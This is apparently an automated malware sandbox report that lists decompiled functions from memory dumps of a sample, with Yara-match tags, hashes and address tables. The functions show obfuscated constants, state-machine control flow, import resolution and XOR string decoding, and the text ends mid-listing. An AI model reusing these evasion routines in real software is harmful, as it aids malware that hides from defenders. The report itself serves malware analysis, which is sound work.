                                          • Instruction ID: 8b27b23f81abca9e4e219f2acda10cb76ff91ed3c970acbc75b201b579ac6a42
                                          • Opcode Fuzzy Hash: 10bd70623fdd4759c151cc12a2df8a474579bf387df243e46218902f470e8f6f
                                          • Instruction Fuzzy Hash: EC3121B1C0020AEBDF49DFA1C94A8EEBFB2FF44314F208158E41276260D3B54A55DF95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 10007F07, Relevance: 3.0, APIs: 2, Instructions: 8COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E10007F07(struct _EXCEPTION_POINTERS* _a4) {

				SetUnhandledExceptionFilter(0);
				return UnhandledExceptionFilter(_a4);
			}



                                          0x10007f0c
                                          0x10007f1c

                                          APIs
                                          • SetUnhandledExceptionFilter.KERNEL32 ref: 10007F0C
                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 10007F15
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2097429023.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000007.00000002.2097424498.0000000010000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000007.00000002.2097438801.000000001000D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000007.00000002.2097445868.0000000010012000.00000004.00020000.sdmp Download File
                                          • Associated: 00000007.00000002.2097450834.0000000010015000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ExceptionFilterUnhandled
                                          • String ID:
                                          • API String ID: 3192549508-0
                                          • Opcode ID: f7c80f92ea83676b0d4ae0fb41d7acd9273c55ff761cf0af19de4335131d4f5f
                                          • Instruction ID: 7be572de92686af6165e4848987e7b2d669c1521723c7f37aea2a3297de6ad46
                                          • Opcode Fuzzy Hash: f7c80f92ea83676b0d4ae0fb41d7acd9273c55ff761cf0af19de4335131d4f5f
                                          • Instruction Fuzzy Hash: BAB09231044218BBEA003B91DC49BCC3F29EB056A2F004012F60D44064CF6256508AA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 006D5A61, Relevance: 2.7, Strings: 2, Instructions: 155COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 68%
                                          			E006D5A61(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				void* __ecx;
				void* _t115;
				signed int _t129;
				void* _t136;
				void* _t156;
				signed int _t157;
				signed int _t158;
				signed int _t159;
				signed int* _t163;

				_push(_a16);
				_t156 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E006C602B(_t115);
				_v564 = 0x4767;
				_t163 =  &(( &_v600)[6]);
				_v564 = _v564 << 9;
				_v564 = _v564 ^ 0x008e895f;
				_t136 = 0x30c826c8;
				_v588 = 0x30cc;
				_v588 = _v588 + 0x4702;
				_t157 = 0x63;
				_v588 = _v588 / _t157;
				_v588 = _v588 + 0xb80e;
				_v588 = _v588 ^ 0x0000cf36;
				_v596 = 0xadf;
				_t158 = 0x66;
				_v596 = _v596 * 0x61;
				_v596 = _v596 / _t158;
				_t159 = 0x4c;
				_v596 = _v596 / _t159;
				_v596 = _v596 ^ 0x0000541c;
				_v592 = 0x64b0;
				_v592 = _v592 * 0x15;
				_v592 = _v592 + 0xa35f;
				_v592 = _v592 >> 0xe;
				_v592 = _v592 ^ 0x0000251e;
				_v600 = 0x3c82;
				_v600 = _v600 | 0xdba50be5;
				_v600 = _v600 ^ 0x0661176e;
				_v600 = _v600 + 0x2491;
				_v600 = _v600 ^ 0xddc40dba;
				_v572 = 0x6631;
				_v572 = _v572 + 0xffff287e;
				_v572 = _v572 + 0x2e34;
				_v572 = _v572 ^ 0xffff8a80;
				_v584 = 0x3cf9;
				_v584 = _v584 ^ 0x209cd78c;
				_v584 = _v584 ^ 0x88ea975c;
				_v584 = _v584 | 0x088f8ebb;
				_v584 = _v584 ^ 0xa8ffe4fe;
				_v560 = 0x5a99;
				_v560 = _v560 << 2;
				_v560 = _v560 ^ 0x0001627e;
				_v576 = 0xc549;
				_v576 = _v576 * 0x36;
				_v576 = _v576 + 0xffff72cb;
				_v576 = _v576 ^ 0x00296382;
				_v568 = 0xc477;
				_v568 = _v568 + 0xffff852d;
				_v568 = _v568 ^ 0x00000bf7;
				_t160 = _v568;
				_v580 = 0xe5ab;
				_v580 = _v580 + 0x26f9;
				_v580 = _v580 + 0xffffb6c9;
				_v580 = _v580 ^ 0x0000c36f;
				do {
					while(_t136 != 0x96b3cdc) {
						if(_t136 == 0xc60f3b0) {
							_t129 = E006D9AC7(_v572, _v584,  &_v556, _v560, _t160);
							_t163 =  &(_t163[3]);
							L11:
							asm("sbb ecx, ecx");
							_t136 = ( ~_t129 & 0xe09a757b) + 0x28d0c761;
							continue;
						}
						if(_t136 == 0x1f7f9ad4) {
							_v556 = 0x22c;
							_t129 = E006C76F7( &_v556, _v592, _v600, _t160);
							goto L11;
						}
						if(_t136 == 0x28d0c761) {
							return E006D4F7D(_v576, _v568, _t160);
						}
						if(_t136 != 0x2dc3f3d6) {
							if(_t136 != 0x30c826c8) {
								goto L16;
							} else {
								_t136 = 0x2dc3f3d6;
								continue;
							}
							L19:
							return _t129;
						}
						_t129 = E006C1C88(_t136, _t136, _v580);
						_t160 = _t129;
						_t163 =  &(_t163[3]);
						if(_t129 != 0xffffffff) {
							_t136 = 0x1f7f9ad4;
							continue;
						}
						goto L19;
					}
					_push(_t156);
					_push( &_v556);
					if(_a4() == 0) {
						_t136 = 0x28d0c761;
						goto L16;
					} else {
						_t136 = 0xc60f3b0;
						continue;
					}
					goto L19;
					L16:
				} while (_t136 != 0x22b9bf83);
				return _t129;
			}
























                                          0x006d5a6b
                                          0x006d5a72
                                          0x006d5a74
                                          0x006d5a7b
                                          0x006d5a82
                                          0x006d5a89
                                          0x006d5a8b
                                          0x006d5a90
                                          0x006d5a98
                                          0x006d5a9b
                                          0x006d5aa2
                                          0x006d5aaa
                                          0x006d5aaf
                                          0x006d5abc
                                          0x006d5acf
                                          0x006d5ad4
                                          0x006d5ada
                                          0x006d5ae2
                                          0x006d5aea
                                          0x006d5af7
                                          0x006d5afa
                                          0x006d5b06
                                          0x006d5b0e
                                          0x006d5b11
                                          0x006d5b15
                                          0x006d5b1d
                                          0x006d5b2a
                                          0x006d5b2e
                                          0x006d5b36
                                          0x006d5b3b
                                          0x006d5b43
                                          0x006d5b4b
                                          0x006d5b53
                                          0x006d5b5b
                                          0x006d5b63
                                          0x006d5b6b
                                          0x006d5b73
                                          0x006d5b7b
                                          0x006d5b83
                                          0x006d5b8b
                                          0x006d5b93
                                          0x006d5b9b
                                          0x006d5ba3
                                          0x006d5bab
                                          0x006d5bb3
                                          0x006d5bbb
                                          0x006d5bc0
                                          0x006d5bc8
                                          0x006d5bd5
                                          0x006d5bd9
                                          0x006d5be1
                                          0x006d5be9
                                          0x006d5bf1
                                          0x006d5bf9
                                          0x006d5c01
                                          0x006d5c05
                                          0x006d5c0d
                                          0x006d5c15
                                          0x006d5c1d
                                          0x006d5c25
                                          0x006d5c25
                                          0x006d5c33
                                          0x006d5cd1
                                          0x006d5cd6
                                          0x006d5cac
                                          0x006d5cb0
                                          0x006d5cb8
                                          0x00000000
                                          0x006d5cb8
                                          0x006d5c3f
                                          0x006d5c9d
                                          0x006d5ca5
                                          0x00000000
                                          0x006d5cab
                                          0x006d5c43
                                          0x00000000
                                          0x006d5d11
                                          0x006d5c4f
                                          0x006d5c57
                                          0x00000000
                                          0x006d5c5d
                                          0x006d5c5d
                                          0x00000000
                                          0x006d5c5d
                                          0x006d5d1c
                                          0x006d5d1c
                                          0x006d5d1c
                                          0x006d5c76
                                          0x006d5c7b
                                          0x006d5c7d
                                          0x006d5c83
                                          0x006d5c89
                                          0x00000000
                                          0x006d5c89
                                          0x00000000
                                          0x006d5c83
                                          0x006d5cdb
                                          0x006d5ce0
                                          0x006d5cea
                                          0x006d5cf3
                                          0x00000000
                                          0x006d5cec
                                          0x006d5cec
                                          0x00000000
                                          0x006d5cec
                                          0x00000000
                                          0x006d5cf5
                                          0x006d5cf5
                                          0x00000000

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandle
                                          • String ID: 4.$gG
                                          • API String ID: 2962429428-791606841
                                          • Opcode ID: c2f05fb42b6ff04c4c7a9286f8ef30f30c4201f765be1d6751a13ce882cf6e31
                                          • Instruction ID: a729aa62d97ebc4c38413cc94c0fc489e02018965f7952b3ff85f30978dd8ef6
                                          • Opcode Fuzzy Hash: c2f05fb42b6ff04c4c7a9286f8ef30f30c4201f765be1d6751a13ce882cf6e31
                                          • Instruction Fuzzy Hash: 3061BC715187419BD7A8CF24C88985FBBE2FFC4318F100A1EF586962A0D7798A49CB87
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 006CE05A, Relevance: 2.6, Strings: 2, Instructions: 126COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E006CE05A(void* __ecx, void* __edx) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed short _v40;
				signed int _v44;
				signed int _v48;
				signed int _t107;
				signed short _t113;
				signed short _t116;
				signed short _t118;
				signed int _t120;
				signed int _t121;
				signed int _t122;
				signed int _t123;
				intOrPtr _t124;
				signed short _t128;
				signed short* _t143;
				signed short _t145;
				void* _t146;
				signed int* _t147;

				_t147 =  &_v48;
				_v16 = 0x6d293b;
				_v12 = 0x468ef5;
				_v8 = 0;
				_v4 = 0;
				_t146 = __ecx;
				_v40 = 0x7b4e;
				_v40 = _v40 + 0xffff3b83;
				_v40 = _v40 + 0xffffa7a8;
				_v40 = _v40 ^ 0xffff5e78;
				_v20 = 0xb6a1;
				_t120 = 0x38;
				_v20 = _v20 / _t120;
				_v20 = _v20 ^ 0x00007f71;
				_v44 = 0x997f;
				_v44 = _v44 ^ 0xba9196e9;
				_v44 = _v44 ^ 0x66374254;
				_t26 =  &_v44; // 0x66374254
				_t121 = 0xe;
				_v44 =  *_t26 / _t121;
				_v44 = _v44 ^ 0x0fc29c0d;
				_v48 = 0x4c26;
				_v48 = _v48 | 0xfd76fef6;
				_v48 = _v48 >> 3;
				_v48 = _v48 ^ 0x1faed217;
				_v24 = 0xc5b2;
				_t122 = 0x42;
				_v24 = _v24 * 0x67;
				_v24 = _v24 << 9;
				_v24 = _v24 ^ 0x9f1566f7;
				_v28 = 0x55d;
				_v28 = _v28 << 0xb;
				_v28 = _v28 / _t122;
				_v28 = _v28 ^ 0x0000f55e;
				_v32 = 0x8f6f;
				_t123 = 6;
				_v32 = _v32 * 0x4f;
				_v32 = _v32 + 0xffffe8fc;
				_v32 = _v32 ^ 0x002c0f4c;
				_v36 = 0xd672;
				_v36 = _v36 / _t123;
				_v36 = _v36 + 0xffffc0a7;
				_v36 = _v36 ^ 0xffffa997;
				_t107 = _v40;
				_t124 =  *((intOrPtr*)(__edx + 0x78 + _t107 * 8));
				if(_t124 == 0 ||  *((intOrPtr*)(__edx + 0x7c + _t107 * 8)) == 0) {
					L13:
					return 1;
				} else {
					_t145 = _t124 + __ecx;
					while(1) {
						_t110 =  *((intOrPtr*)(_t145 + 0xc));
						if( *((intOrPtr*)(_t145 + 0xc)) == 0) {
							goto L13;
						}
						_t128 = E006D4AAF(_t110 + _t146, _v20, _v44, _v48);
						_v40 = _t128;
						__eflags = _t128;
						if(_t128 == 0) {
							L15:
							return 0;
						}
						_t143 =  *_t145 + _t146;
						_t118 =  *((intOrPtr*)(_t145 + 0x10)) + _t146;
						while(1) {
							_t113 =  *_t143;
							__eflags = _t113;
							if(__eflags == 0) {
								break;
							}
							if(__eflags >= 0) {
								_t115 = _t113 + 2 + _t146;
								__eflags = _t113 + 2 + _t146;
							} else {
								_t115 = _t113 & 0x0000ffff;
							}
							_t116 = E006C6228(_v24, _v28, _v32, _v36, _t128, _t115);
							_t147 =  &(_t147[4]);
							__eflags = _t116;
							if(_t116 == 0) {
								goto L15;
							} else {
								_t128 = _v40;
								_t143 =  &(_t143[2]);
								 *_t118 = _t116;
								_t118 = _t118 + 4;
								__eflags = _t118;
								continue;
							}
						}
						_t145 = _t145 + 0x14;
						__eflags = _t145;
					}
					goto L13;
				}
			}





























                                          0x006ce05a
                                          0x006ce05d
                                          0x006ce065
                                          0x006ce075
                                          0x006ce07b
                                          0x006ce07f
                                          0x006ce081
                                          0x006ce089
                                          0x006ce091
                                          0x006ce099
                                          0x006ce0a1
                                          0x006ce0af
                                          0x006ce0b4
                                          0x006ce0ba
                                          0x006ce0c2
                                          0x006ce0ca
                                          0x006ce0d2
                                          0x006ce0da
                                          0x006ce0de
                                          0x006ce0e3
                                          0x006ce0e9
                                          0x006ce0f1
                                          0x006ce0f9
                                          0x006ce101
                                          0x006ce106
                                          0x006ce10e
                                          0x006ce11b
                                          0x006ce11e
                                          0x006ce122
                                          0x006ce127
                                          0x006ce12f
                                          0x006ce137
                                          0x006ce144
                                          0x006ce148
                                          0x006ce150
                                          0x006ce15d
                                          0x006ce15e
                                          0x006ce162
                                          0x006ce16a
                                          0x006ce172
                                          0x006ce180
                                          0x006ce184
                                          0x006ce18c
                                          0x006ce194
                                          0x006ce198
                                          0x006ce19e
                                          0x006ce21c
                                          0x00000000
                                          0x006ce1a6
                                          0x006ce1a6
                                          0x006ce215
                                          0x006ce215
                                          0x006ce21a
                                          0x00000000
                                          0x00000000
                                          0x006ce1c1
                                          0x006ce1c3
                                          0x006ce1c7
                                          0x006ce1c9
                                          0x006ce227
                                          0x00000000
                                          0x006ce227
                                          0x006ce1d0
                                          0x006ce1d2
                                          0x006ce20c
                                          0x006ce20c
                                          0x006ce20e
                                          0x006ce210
                                          0x00000000
                                          0x00000000
                                          0x006ce1d6
                                          0x006ce1e0
                                          0x006ce1e0
                                          0x006ce1d8
                                          0x006ce1d8
                                          0x006ce1d8
                                          0x006ce1f4
                                          0x006ce1f9
                                          0x006ce1fc
                                          0x006ce1fe
                                          0x00000000
                                          0x006ce200
                                          0x006ce200
                                          0x006ce204
                                          0x006ce207
                                          0x006ce209
                                          0x006ce209
                                          0x00000000
                                          0x006ce209
                                          0x006ce1fe
                                          0x006ce212
                                          0x006ce212
                                          0x006ce212
                                          0x00000000
                                          0x006ce215

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: &L$TB7f
                                          • API String ID: 0-2122134793
                                          • Opcode ID: ccec81fc12bb8d59d6cf69cf5184f25956325339f73310d4cae82d3e58d50a0d
                                          • Instruction ID: 4f1dc0f1a37a6961da631f6d37c7eb00395b202ea0a3aeb1a047fcca2aca374f
                                          • Opcode Fuzzy Hash: ccec81fc12bb8d59d6cf69cf5184f25956325339f73310d4cae82d3e58d50a0d
                                          • Instruction Fuzzy Hash: 2C5177716083028FD318CF25D845A2BBBF2FBD4358F144A1DF49996260D779DA4ACF86
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 006CB112, Relevance: 2.6, Strings: 2, Instructions: 111COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E006CB112() {
				char _v520;
				signed int _v524;
				intOrPtr _v528;
				intOrPtr _v532;
				intOrPtr _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				char* _t91;
				void* _t94;
				intOrPtr _t97;
				signed int _t109;
				signed int _t110;
				short* _t113;

				_v524 = _v524 & 0x00000000;
				_v536 = 0x15a9e0;
				_t94 = 0x2447ce85;
				_v532 = 0xcaf76;
				_v528 = 0x42cbc4;
				_v544 = 0x1d8c;
				_v544 = _v544 << 8;
				_v544 = _v544 ^ 0x001dbb75;
				_v564 = 0xb98d;
				_v564 = _v564 * 0x6d;
				_v564 = _v564 | 0xb6682b1a;
				_t109 = 0x16;
				_v564 = _v564 / _t109;
				_v564 = _v564 ^ 0x084aef85;
				_v568 = 0xa53e;
				_v568 = _v568 | 0x3e6d869d;
				_t110 = 0x46;
				_v568 = _v568 * 0x2b;
				_v568 = _v568 ^ 0x7c6b3e02;
				_v540 = 0x49b5;
				_v540 = _v540 + 0xbc03;
				_v540 = _v540 ^ 0x0001452b;
				_v556 = 0x9474;
				_v556 = _v556 << 0xb;
				_v556 = _v556 ^ 0xd8ad9d33;
				_v556 = _v556 ^ 0xdc0e2a5f;
				_v560 = 0x11f0;
				_v560 = _v560 + 0xffffe240;
				_v560 = _v560 + 0xb761;
				_v560 = _v560 ^ 0x000087cb;
				_v548 = 0x2457;
				_v548 = _v548 / _t110;
				_v548 = _v548 ^ 0x000075df;
				do {
					while(_t94 != 0x14e9f4e4) {
						if(_t94 == 0x21e9d2a8) {
							_t97 =  *0x6dca2c; // 0x248300
							_t82 = _t97 + 0x230; // 0x710050
							return E006C6636(_t82, _v556, _v560, _v548, _t113);
						}
						if(_t94 == 0x2275b3e1) {
							_t91 = E006D3E3F(_t94,  &_v520, __eflags, _v544, _v564);
							_t94 = 0x14e9f4e4;
							continue;
						}
						if(_t94 != 0x2447ce85) {
							goto L15;
						}
						_t94 = 0x2275b3e1;
					}
					_v552 = 0xe342;
					_v552 = _v552 ^ 0x7b193e87;
					_v552 = _v552 ^ 0x7b19ddc7;
					_t113 =  &_v520 + E006D0ADC( &_v520, _v568, _v540) * 2;
					while(1) {
						_t91 =  &_v520;
						__eflags = _t113 - _t91;
						if(_t113 <= _t91) {
							break;
						}
						__eflags =  *_t113 - 0x5c;
						if( *_t113 != 0x5c) {
							L10:
							_t113 = _t113 - 2;
							__eflags = _t113;
							continue;
						}
						_t76 =  &_v552;
						 *_t76 = _v552 - 1;
						__eflags =  *_t76;
						if( *_t76 == 0) {
							__eflags = _t113;
							L14:
							_t94 = 0x21e9d2a8;
							goto L15;
						}
						goto L10;
					}
					goto L14;
					L15:
					__eflags = _t94 - 0x318d27d3;
				} while (__eflags != 0);
				return _t91;
			}






















                                          0x006cb118
                                          0x006cb11f
                                          0x006cb127
                                          0x006cb12c
                                          0x006cb134
                                          0x006cb13c
                                          0x006cb144
                                          0x006cb149
                                          0x006cb151
                                          0x006cb162
                                          0x006cb16b
                                          0x006cb183
                                          0x006cb188
                                          0x006cb18e
                                          0x006cb196
                                          0x006cb19e
                                          0x006cb1b3
                                          0x006cb1b4
                                          0x006cb1b8
                                          0x006cb1c0
                                          0x006cb1c8
                                          0x006cb1d0
                                          0x006cb1d8
                                          0x006cb1e0
                                          0x006cb1e5
                                          0x006cb1ed
                                          0x006cb1f5
                                          0x006cb1fd
                                          0x006cb205
                                          0x006cb20d
                                          0x006cb215
                                          0x006cb223
                                          0x006cb227
                                          0x006cb233
                                          0x006cb233
                                          0x006cb239
                                          0x006cb2ce
                                          0x006cb2d8
                                          0x00000000
                                          0x006cb2e3
                                          0x006cb241
                                          0x006cb25b
                                          0x006cb262
                                          0x00000000
                                          0x006cb262
                                          0x006cb249
                                          0x00000000
                                          0x00000000
                                          0x006cb24b
                                          0x006cb24b
                                          0x006cb266
                                          0x006cb272
                                          0x006cb27a
                                          0x006cb294
                                          0x006cb2a8
                                          0x006cb2a8
                                          0x006cb2ac
                                          0x006cb2ae
                                          0x00000000
                                          0x00000000
                                          0x006cb299
                                          0x006cb29d
                                          0x006cb2a5
                                          0x006cb2a5
                                          0x006cb2a5
                                          0x00000000
                                          0x006cb2a5
                                          0x006cb29f
                                          0x006cb29f
                                          0x006cb29f
                                          0x006cb2a3
                                          0x006cb2b2
                                          0x006cb2b5
                                          0x006cb2b5
                                          0x00000000
                                          0x006cb2b5
                                          0x00000000
                                          0x006cb2a3
                                          0x00000000
                                          0x006cb2b7
                                          0x006cb2b7
                                          0x006cb2b7
                                          0x00000000

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: B$W$
                                          • API String ID: 0-584637061
                                          • Opcode ID: b42cd1a0af5cf84cfff31a45a81c548609c2404d3b535a16a5070798f79c7659
                                          • Instruction ID: 44d4c07005fe587321f57eb8afb5fe993e82c64a3afbe45a7c2bcc59c48bf9da
                                          • Opcode Fuzzy Hash: b42cd1a0af5cf84cfff31a45a81c548609c2404d3b535a16a5070798f79c7659
                                          • Instruction Fuzzy Hash: 35416C715083418BD714DF21D586A6FBBE2FBC8758F104A1EF085662A0D7788B4ACF87
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 006D31E2, Relevance: 2.6, Strings: 2, Instructions: 102COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E006D31E2(void* __eflags) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v572;
				intOrPtr* _t106;
				signed int _t110;
				signed int _t111;

				_v52 = 0;
				_v28 = 0x38ff;
				_v28 = _v28 | 0x657975a1;
				_v28 = _v28 ^ 0x65795a60;
				_v36 = 0xb7c2;
				_t110 = 0x62;
				_v36 = _v36 / _t110;
				_v36 = _v36 ^ 0x0000110e;
				_v24 = 0xe00a;
				_v24 = _v24 << 5;
				_v24 = _v24 + 0xffffb393;
				_v24 = _v24 ^ 0x001b9d0d;
				_v20 = 0xfb31;
				_v20 = _v20 + 0xbdbd;
				_v20 = _v20 + 0x1446;
				_v20 = _v20 ^ 0x0001be9a;
				_v40 = 0x7fef;
				_v40 = _v40 >> 1;
				_v40 = _v40 ^ 0x00001ed5;
				_v8 = 0xf1c1;
				_v8 = _v8 << 7;
				_v8 = _v8 + 0x6d97;
				_v8 = _v8 << 9;
				_v8 = _v8 ^ 0xf29c2a73;
				_v32 = 0xb6f2;
				_v32 = _v32 | 0x667f3c4f;
				_v32 = _v32 ^ 0x667f909f;
				_v16 = 0xa641;
				_t111 = 0x3c;
				_v16 = _v16 / _t111;
				_v16 = _v16 >> 7;
				_v16 = _v16 ^ 0x1e480640;
				_v16 = _v16 ^ 0x1e480386;
				_v44 = 0xa73d;
				_v44 = _v44 >> 0xd;
				_v44 = _v44 ^ 0x000057d1;
				_v48 = 0x6a4b;
				_v48 = _v48 << 7;
				_v48 = _v48 ^ 0x00354ae8;
				_v12 = 0x27be;
				_v12 = _v12 ^ 0xc55dd82d;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0xb51d94d3;
				_v12 = _v12 ^ 0x844acffa;
				_t112 = _v28;
				if(E006C1210(_v28, _v36, _t111, _v24,  &_v572, _v20) != 0) {
					_t106 =  &_v572;
					if(_v572 != 0) {
						while( *_t106 != 0x5c) {
							_t106 = _t106 + 2;
							if( *_t106 != 0) {
								continue;
							} else {
							}
							goto L6;
						}
						_t112 = 0;
						 *((short*)(_t106 + 2)) = 0;
					}
					L6:
					E006D375D(_v40, _t112, _t112,  &_v572, _v8, _v32, _v16, _t112,  &_v52, _v44, _t112, _v48, _t112, _v12);
				}
				return _v52;
			}



















                                          0x006d31f0
                                          0x006d31f3
                                          0x006d31fa
                                          0x006d3201
                                          0x006d3208
                                          0x006d3214
                                          0x006d3219
                                          0x006d321e
                                          0x006d3225
                                          0x006d322c
                                          0x006d3230
                                          0x006d3237
                                          0x006d323e
                                          0x006d3245
                                          0x006d324c
                                          0x006d3253
                                          0x006d325a
                                          0x006d3261
                                          0x006d3264
                                          0x006d326b
                                          0x006d3272
                                          0x006d3276
                                          0x006d327d
                                          0x006d3281
                                          0x006d3288
                                          0x006d328f
                                          0x006d3296
                                          0x006d329d
                                          0x006d32a7
                                          0x006d32aa
                                          0x006d32b3
                                          0x006d32b7
                                          0x006d32be
                                          0x006d32c5
                                          0x006d32cc
                                          0x006d32d0
                                          0x006d32d7
                                          0x006d32de
                                          0x006d32e2
                                          0x006d32e9
                                          0x006d32f0
                                          0x006d32f7
                                          0x006d32fb
                                          0x006d3302
                                          0x006d3314
                                          0x006d3321
                                          0x006d3323
                                          0x006d3330
                                          0x006d3332
                                          0x006d3338
                                          0x006d333e
                                          0x00000000
                                          0x00000000
                                          0x006d3340
                                          0x00000000
                                          0x006d333e
                                          0x006d3342
                                          0x006d3344
                                          0x006d3344
                                          0x006d3348
                                          0x006d336d
                                          0x006d3372
                                          0x006d337c

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: `Zye$J5
                                          • API String ID: 0-1569392922
                                          • Opcode ID: a18ca0a6be4549facd08cad680643561a0f933ec655d038f342e6083d984c38d
                                          • Instruction ID: d70a1a684fb333043a1ea34361c834bb7c4b3603997c09775689fce6fec42238
                                          • Opcode Fuzzy Hash: a18ca0a6be4549facd08cad680643561a0f933ec655d038f342e6083d984c38d
                                          • Instruction Fuzzy Hash: 1F4114B1C0021DEBDF59CFA0C94A9EEBBB5FB08304F108199E111B62A0D7B94B54CFA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 006D889D, Relevance: 2.6, Strings: 2, Instructions: 101COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 94%
                                          			E006D889D(signed int* __ecx, void* __edx, void* __eflags) {
				void* _t50;
				signed int _t57;
				signed int _t74;
				signed int _t75;
				signed int _t84;
				unsigned int _t85;
				unsigned int _t86;
				signed int _t93;
				signed int _t94;
				signed int* _t95;
				signed int* _t96;
				signed int _t97;
				signed int _t98;
				unsigned int _t100;
				void* _t106;
				short _t107;
				void* _t108;
				void* _t109;

				_push( *((intOrPtr*)(_t108 + 0x30)));
				_push(__ecx);
				E006C602B(_t50);
				 *((intOrPtr*)(_t108 + 0x30)) = 0x3e4ab4;
				_t95 =  &(__ecx[1]);
				_t107 = 0;
				 *((intOrPtr*)(_t108 + 0x34)) = 0;
				 *(_t108 + 0x24) = 0xc5f8;
				 *(_t108 + 0x24) =  *(_t108 + 0x24) + 0x6051;
				 *(_t108 + 0x24) =  *(_t108 + 0x24) ^ 0x00010c1f;
				 *(_t108 + 0x1c) = 0x21c8;
				_t97 = 0x48;
				 *(_t108 + 0x1c) =  *(_t108 + 0x1c) / _t97;
				 *(_t108 + 0x1c) =  *(_t108 + 0x1c) + 0xffffac68;
				 *(_t108 + 0x1c) =  *(_t108 + 0x1c) ^ 0xffffa2cd;
				 *(_t108 + 0x20) = 0xf93e;
				_t98 = 0xe;
				 *(_t108 + 0x20) =  *(_t108 + 0x20) / _t98;
				 *(_t108 + 0x20) =  *(_t108 + 0x20) ^ 0x00004b7b;
				_t93 =  *__ecx;
				_t96 =  &(_t95[1]);
				_t57 =  *_t95 ^ _t93;
				 *(_t108 + 0x28) = _t93;
				 *(_t108 + 0x2c) = _t57;
				_t32 = _t57 + 1; // 0xf93f
				_t100 =  !=  ? (_t32 & 0xfffffffc) + 4 : _t32;
				_t109 = _t108 + 4;
				_t74 = E006C8736(_t100 + _t100);
				 *(_t109 + 0x20) = _t74;
				if(_t74 != 0) {
					_t94 = _t74;
					_t106 =  >  ? 0 :  &(_t96[_t100 >> 2]) - _t96 + 3 >> 2;
					if(_t106 != 0) {
						_t75 =  *(_t109 + 0x1c);
						do {
							_t84 =  *_t96;
							_t96 =  &(_t96[1]);
							_t85 = _t84 ^ _t75;
							 *_t94 = _t85 & 0x000000ff;
							_t94 = _t94 + 8;
							 *((short*)(_t94 - 6)) = _t85 >> 0x00000008 & 0x000000ff;
							_t86 = _t85 >> 0x10;
							_t107 = _t107 + 1;
							 *((short*)(_t94 - 4)) = _t86 & 0x000000ff;
							 *((short*)(_t94 - 2)) = _t86 >> 0x00000008 & 0x000000ff;
						} while (_t107 < _t106);
						_t74 =  *(_t109 + 0x18);
					}
					 *((short*)(_t74 +  *(_t109 + 0x20) * 2)) = 0;
				}
				return _t74;
			}





















                                          0x006d88a4
                                          0x006d88a9
                                          0x006d88aa
                                          0x006d88af
                                          0x006d88b7
                                          0x006d88ba
                                          0x006d88be
                                          0x006d88c2
                                          0x006d88ca
                                          0x006d88d2
                                          0x006d88da
                                          0x006d88e8
                                          0x006d88ed
                                          0x006d88f1
                                          0x006d88f9
                                          0x006d8901
                                          0x006d890f
                                          0x006d8912
                                          0x006d8916
                                          0x006d891e
                                          0x006d8922
                                          0x006d8925
                                          0x006d8927
                                          0x006d892b
                                          0x006d892f
